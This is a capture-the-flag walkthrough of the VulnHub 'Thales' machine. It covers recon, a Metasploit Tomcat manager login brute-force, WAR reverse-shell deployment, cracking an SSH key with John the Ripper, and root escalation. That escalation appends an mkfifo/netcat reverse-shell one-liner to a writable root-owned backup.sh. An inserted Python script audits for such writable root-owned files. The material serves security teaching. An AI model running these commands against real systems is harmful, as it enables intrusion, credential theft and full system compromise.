THALES

Kevin Mwenda

Hi guys, we have another vulnerable machine to exploit. Link for the machine: https://www.vulnhub.com/entry/thales-1,749/. The description for the machine is: “Open your eyes and change your perspective”

First and foremost, we need to get the IP of our vulnerable machine.

sudo netdiscover -r 10.10.10.1/24 -i eth0

Great, we’ve obtained our IP. Now, let’s conduct some reconnaissance and uncover what lies ahead.

nmap -A -sV -P 10.10.10.12

We got two open ports: 22 (SSH) and 8080 (web server), and the service scan shows Apache Tomcat 9.0.52 running on 8080. Let’s take a look at the website first. It looks like the default landing page for Apache Tomcat.

We now need to launch gobuster. When the command is executed, gobuster performs a directory and file brute-force against the specified target web server, also searching for files with the specified extensions. This can help identify files and directories that a plain directory wordlist alone would miss.

gobuster dir -u http://10.10.10.12:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php

We got some directories, but there wasn’t anything important🥱. We move to another important tool, the Metasploit Framework😏, which we launch by typing msfconsole. We will be using auxiliary/scanner/http/tomcat_mgr_login; make sure you set the parameters, and it should look something like this:

We get a successful login, as seen below. Now let’s go back to the site and try to log in with Username: tomcat and Password: role1.

As seen above, we were able to log in with the credentials we got from msfconsole. We now use HackTricks to help craft a Tomcat WAR payload, which we can deploy through the manager application;

We copy the HackTricks reverse shell and edit it to our preference, as below;

Now we need to go back to our website, upload our payload and deploy it. We then start a netcat listener to catch the session.

We use curl to request the deployed reverse-shell payload, which triggers a session that our netcat listener catches. We now need to look around for anything interesting.

python3 -c 'import pty;pty.spawn("/bin/bash")'

We use python3 to spawn a fully interactive shell, as seen above. While snooping around we found an id_rsa key, seen below; let’s try and see if we can get its password.

We need to prepare our file for John the Ripper, a password-cracking tool.

/usr/share/john/ssh2john.py id_rsa > break.txt

Our file is now ready and should look like this;

Once we run John the Ripper against it, the password is cracked, as seen below;

john --wordlist=/usr/share/wordlists/rockyou.txt break.txt

We try the password we got to upgrade our shell to the Thales user, which works;

We find a note left for us with a very interesting message🤔 Let’s see how true the message is.

Next, we examine the backup.sh file to determine its properties. We find that the file has read, write and execute permissions set, and that it is owned by the root user.

The backup.sh looks as below;

Since the backup.sh file is writable by our user, we can modify the script by appending a reverse shell payload, with the aim of getting a root shell.
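The weakness here is a root-owned script that an unprivileged account can edit. The following audit script, an added example and not the author's or the machine's code, walks a directory tree and reports every regular file owned by root (or a uid you pass in) that has the group- or other-write bit set, which is exactly the property backup.sh had; the sample tree built in demo() is constructed, and since it cannot create root-owned files it audits for the current uid instead.

```python
import os
import stat
import sys
import tempfile
from typing import List, Tuple


def writable_by_non_owner(mode: int) -> bool:
    """True when the group- or other-write bit is set on the mode."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def find_modifiable_files(root_dir: str, owner_uid: int = 0) -> List[Tuple[str, int]]:
    """Return (path, st_mode) for regular files under root_dir that are owned by
    owner_uid (root by default) yet writable by group or others. Symlinks are
    not followed (lstat), so a planted link cannot redirect the audit."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root_dir):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable: skip rather than abort the audit
            if (stat.S_ISREG(st.st_mode) and st.st_uid == owner_uid
                    and writable_by_non_owner(st.st_mode)):
                findings.append((path, st.st_mode))
    return sorted(findings)


def demo() -> List[str]:
    """Build a constructed sample tree (hypothetical names, not from the machine)
    and return the basenames the audit flags. The files belong to the current
    user, so owner_uid is the current uid instead of root."""
    with tempfile.TemporaryDirectory() as base:
        for name, mode in (("backup.sh", 0o777), ("ok.sh", 0o755), ("notes.txt", 0o664)):
            path = os.path.join(base, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/bash\n# constructed placeholder content\n")
            os.chmod(path, mode)  # set the exact mode regardless of umask
        return [os.path.basename(p) for p, _ in find_modifiable_files(base, os.getuid())]


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "/etc"
    for path, mode in find_modifiable_files(target, owner_uid=0):
        # the remediation is to drop the write bits for everyone but the owner
        print(f"{stat.filemode(mode)} {path}   fix: chmod go-w {path}")
```

Run it as root (or any user that can stat the tree) against a directory such as /etc to list root-owned scripts other accounts could tamper with; only backup.sh and notes.txt are flagged in the constructed demo, because ok.sh at 0755 is writable only by its owner.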

We now head to pentestmonkey, where we get a reverse shell payload to use.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.8 4242 >/tmp/f" >> backup.sh

Finally we get a root shell🥳

As seen above, we captured the flag. This was an easy but fun machine. See you in the next one🫡